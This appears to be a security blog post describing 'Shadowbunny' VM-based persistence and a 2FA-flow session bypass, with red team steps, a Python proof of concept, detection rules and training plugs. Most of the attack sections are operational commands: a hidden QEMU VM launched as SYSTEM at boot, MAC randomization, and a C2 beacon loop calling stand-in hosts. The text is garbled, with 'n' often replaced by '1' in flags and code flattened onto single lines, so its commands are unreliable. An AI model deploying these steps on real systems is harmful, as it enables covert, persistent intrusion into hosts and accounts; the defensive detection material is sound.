Listen to this Post

Introduction
In the evolving landscape of offensive security, red team operators must continuously adapt to bypass modern detection mechanisms while maintaining operational security (OPSEC). Two critical techniques that have gained prominence are VM-based evasion through the Shadowbunny persistence method and sophisticated 2FA abuse for maintaining access. These approaches demonstrate how adversaries think beyond traditional exploitation—focusing instead on stealth, persistence, and the subtle manipulation of authentication flows that defenders often overlook.
Learning Objectives
- Understand how to deploy VM-based persistence mechanisms for evasion and long-term access
- Master the 2FA persistence abuse technique and learn to test for this vulnerability
- Develop comprehensive detection and mitigation strategies for both attack vectors
- Gain practical command-line skills for monitoring, forensics, and hardening
You Should Know
- Shadowbunny VM Evasion and Persistence: The Art of Invisible Access
The Shadowbunny technique represents a paradigm shift in red team operations. Instead of relying on traditional malware that leaves traces on the host filesystem, this approach deploys a lightweight virtual machine instance directly on the target host. This VM serves as a rotating, persistent foothold that evades endpoint detection and response (EDR) solutions by operating in a isolated environment that appears as legitimate virtualization activity.
How It Works:
The adversary provisions a minimal VM image on the compromised host, configures it with stealth networking, and establishes command-and-control (C2) channels that rotate through the VM’s lifecycle. Because the VM is ephemeral and can be destroyed/recreated, it becomes extremely difficult for blue teams to maintain persistence detection.
Step-by-Step Implementation Guide:
Step 1: Prepare the VM Image
Create a minimal Linux-based VM image (Alpine Linux or similar) with only essential tools:
On a Kali Linux machine, create a minimal VM using virt-builder virt-builder alpine --format qcow2 --size 2G -o shadowbunny.qcow2 Install required packages inside the VM virt-customize -a shadowbunny.qcow2 --run-command "apk add openssh curl python3"
Step 2: Configure Stealth Networking
Set up the VM to use network address translation (NAT) and MAC address randomization:
Generate random MAC address MAC_ADDR=$(printf '02:%02x:%02x:%02x:%02x:%02x' $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256))) Configure VM with random MAC and NAT networking virt-install --1ame shadowbunny --ram 512 --disk path=shadowbunny.qcow2,size=2 \ --1etwork network=default,mac=$MAC_ADDR --os-type linux --os-variant alpine \ --graphics none --console pty,target_type=serial --import
Step 3: Implement C2 Rotation
Within the VM, set up a script that rotates C2 endpoints and re-establishes connection:
!/bin/bash
rotate_c2.sh - Rotate C2 endpoints every 5 minutes
C2_LIST=("https://c2-1.example.com" "https://c2-2.example.com" "https://c2-3.example.com")
while true; do
for C2 in "${C2_LIST[@]}"; do
curl -s --max-time 10 $C2/beacon || true
done
sleep 300
done
Step 4: Deploy to Target Host
Transfer the VM image and launch it using QEMU or VirtualBox command-line tools:
On target Windows host (assuming QEMU is installed) qemu-system-x86_64 -m 512 -drive file=shadowbunny.qcow2,format=qcow2 -1etdev user,id=net0 -device e1000,netdev=net0 -1ographic -daemonize
Step 5: Maintain Persistence
Configure the VM to auto-start on system boot via scheduled tasks (Windows) or cron (Linux):
Windows: Create scheduled task schtasks /create /tn "ShadowBunny" /tr "C:\path\to\qemu\qemu-system-x86_64.exe -m 512 -drive file=shadowbunny.qcow2,format=qcow2 -1etdev user,id=net0 -device e1000,netdev=net0 -1ographic" /sc ONSTART /ru SYSTEM Linux: Add to crontab @reboot /usr/bin/qemu-system-x86_64 -m 512 -drive file=/root/shadowbunny.qcow2,format=qcow2 -1etdev user,id=net0 -device e1000,netdev=net0 -1ographic -daemonize
Detection and Mitigation:
Blue teams can detect Shadowbunny deployments by:
- Monitoring for unexpected virtualization processes (qemu, virt, vbox)
- Analyzing network traffic for unusual beaconing patterns
- Inspecting scheduled tasks and startup items for VM execution commands
- Implementing application whitelisting to block unauthorized VM execution
- 2FA Persistence Abuse: When Authentication Becomes a Backdoor
Multi-factor authentication (2FA) is widely considered a security best practice, but Simon Ngoy’s analysis reveals a critical vulnerability in how some applications handle the 2FA login flow. When a user begins the 2FA process, some applications store a “partially logged in” state. If an attacker initiates this flow before a password change, they can complete the 2FA challenge afterward—even if the password was changed in the interim—effectively bypassing the security benefit of password rotation.
Step-by-Step Testing and Exploitation Guide:
Step 1: Initiate 2FA Flow (Attacker Browser)
Open Browser A and navigate to the target application’s login page. Enter the victim’s credentials and proceed to the 2FA challenge screen. Do not complete the 2FA yet—leave this browser tab open.
Step 2: Change Password (Victim Browser)
Open Browser B (or a private/incognito session) and log in with the victim’s current credentials. Navigate to account settings and change the password to a new value.
Step 3: Complete 2FA (Attacker Browser)
Return to Browser A (where the 2FA flow was initiated) and enter the correct 2FA code. If the application is vulnerable, you will be logged in successfully without being prompted for the new password.
Step 4: Verify Persistent Access
Once logged in, attempt to access sensitive data or perform privileged actions. The session should remain valid despite the password change.
Step 5: Automate the Exploit (Python PoC)
import requests import time Configuration TARGET_URL = "https://target-app.example.com" USERNAME = "[email protected]" PASSWORD = "old_password" NEW_PASSWORD = "new_password" TOTP_SECRET = "your_totp_secret" If known, or use MITM to intercept session_a = requests.Session() session_b = requests.Session() Step 1: Initiate 2FA flow in session A login_data = {"username": USERNAME, "password": PASSWORD} response = session_a.post(f"{TARGET_URL}/login", data=login_data) if "2fa_challenge" in response.text: print("[] 2FA flow initiated in session A") Step 2: Change password in session B session_b.post(f"{TARGET_URL}/login", data=login_data) change_data = {"new_password": NEW_PASSWORD} session_b.post(f"{TARGET_URL}/change_password", data=change_data) print("[] Password changed in session B") Step 3: Complete 2FA in session A totp_code = pyotp.TOTP(TOTP_SECRET).now() Requires pyotp library twofa_data = {"code": totp_code} response = session_a.post(f"{TARGET_URL}/2fa_verify", data=twofa_data) if "dashboard" in response.url: print("[!] VULNERABLE: Access granted with old password + 2FA") print("[+] Session A token:", session_a.cookies.get("session")) else: print("[] Not vulnerable - 2FA flow rejected") else: print("[] 2FA not enabled or flow not triggered")
Mitigation Strategy:
Applications should implement a timestamp-based validation mechanism:
- When a user initiates the 2FA login process, store the timestamp of this initiation
- When a password change occurs, log the timestamp of the change
- Upon 2FA completion, reject the login if the 2FA process was started before the last password change
- Additionally, implement “log off all sessions” functionality and check this when finishing the 2FA flow
3. Defensive Hardening: Monitoring and Logging Strategies
To defend against these advanced techniques, organizations must implement comprehensive monitoring:
Windows Event Log Monitoring (PowerShell):
Monitor for VM-related process creation
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} |
Where-Object { $<em>.Properties[bash].Value -match "qemu|vbox|virt" } |
Select-Object TimeCreated, @{N='Process';E={$</em>.Properties[bash].Value}}
Monitor for scheduled task creation (Shadowbunny persistence)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4698} |
Select-Object TimeCreated, Message
Linux Syscall Monitoring (Auditd):
Audit VM execution attempts auditctl -a always,exit -F path=/usr/bin/qemu-system-x86_64 -F perm=x -k vm_execution auditctl -a always,exit -F path=/usr/bin/virt-install -F perm=x -k vm_execution Monitor for unusual network connections (beaconing) auditctl -a always,exit -F a0=2 -F a1=1 -S connect -k outbound_connection
4. Red Team Training and Certification Pathways
Building proficiency in these advanced techniques requires structured learning. Platforms like Hack The Box (HTB) and OffSec provide excellent environments for practice. The HTB Certified Penetration Testing Specialist (CPTS) certification validates practical skills in penetration testing, while OffSec’s PEN-103 course and KLCP exam cover foundational offensive security concepts.
For those serious about red team operations, the Red Team Ops (RTO) course offers deep dives into C2 frameworks, stealth operations, and adversary simulation. Mastering these skills requires hands-on practice with real-world scenarios—starting with CTF platforms, automating attacks with Python, and staying updated on Active Directory exploits and evasion techniques.
5. Malware Analysis Foundations: The Rite of Passage
As Simon Ngoy highlights in his analysis of Practical Malware Analysis, understanding malware internals is non-1egotiable for serious red teamers. The book teaches you to think like malware—covering debugging, disassembly, dynamic analysis, sandboxing, API hooking, packers, and anti-debug tricks. These core principles remain the foundation of the craft, regardless of how tools and frameworks evolve.
Practical Malware Analysis Lab Setup:
Set up a malware analysis sandbox using FLARE VM (Windows) Download and install FLARE VM from GitHub Invoke-WebRequest -Uri "https://raw.githubusercontent.com/mandiant/flare-vm/main/install.ps1" -OutFile "install.ps1" .\install.ps1 -password YourPassword Linux sandbox with REMnux docker pull remnux/remnux-distro docker run -it --rm remnux/remnux-distro Basic static analysis with PE tools pestr --all suspicious.exe | grep -E "Section|Import|Export|Resources"
What Undercode Say:
- Key Takeaway 1: Shadowbunny VM evasion demonstrates that persistence is not just about hiding files—it’s about operating in a completely different execution context that defenders rarely monitor. Red teams should prioritize VM-based C2 over traditional agent-based approaches for high-value targets.
-
Key Takeaway 2: The 2FA persistence vulnerability highlights a fundamental flaw in session management logic. Even with MFA enabled, applications must validate the temporal context of authentication flows. This is a reminder that security is only as strong as the weakest link in the authentication chain—and session state management is often that weak link.
Analysis: The convergence of VM-based evasion and authentication flow abuse represents a new frontier in red team operations. Traditional security controls are designed to detect malicious files, not malicious VMs running on compromised hosts. Similarly, password policies assume that changing credentials invalidates all existing sessions—but the 2FA flow vulnerability proves otherwise. Organizations must adopt a zero-trust mindset that validates every authentication attempt against the complete context, including timestamps and session histories. The most effective defense is a combination of behavioral analytics, application-level validation, and continuous monitoring for anomalous execution patterns.
Prediction:
- +1 The adoption of VM-based evasion techniques will drive innovation in endpoint detection, leading to next-generation EDR solutions capable of analyzing virtualization workloads for malicious activity.
-
-1 As red teams increasingly abuse 2FA flows, we will see a surge in credential theft attacks that bypass MFA entirely, forcing organizations to reevaluate their authentication architectures.
-
+1 The growing awareness of these techniques will accelerate the development of unified red team training programs that combine VM evasion, authentication abuse, and traditional exploitation into comprehensive adversary emulation frameworks.
-
-1 Small and medium businesses that lack advanced monitoring capabilities will remain disproportionately vulnerable to these sophisticated attacks, widening the security gap between enterprise and SMB environments.
-
+1 Open-source detection tools for VM-based persistence will emerge, empowering blue teams with free, accessible solutions to counter these advanced threats.
▶️ Related Video (84% Match):
https://www.youtube.com/watch?v=2HNuzUuVyv0
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Simon Ngoy – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


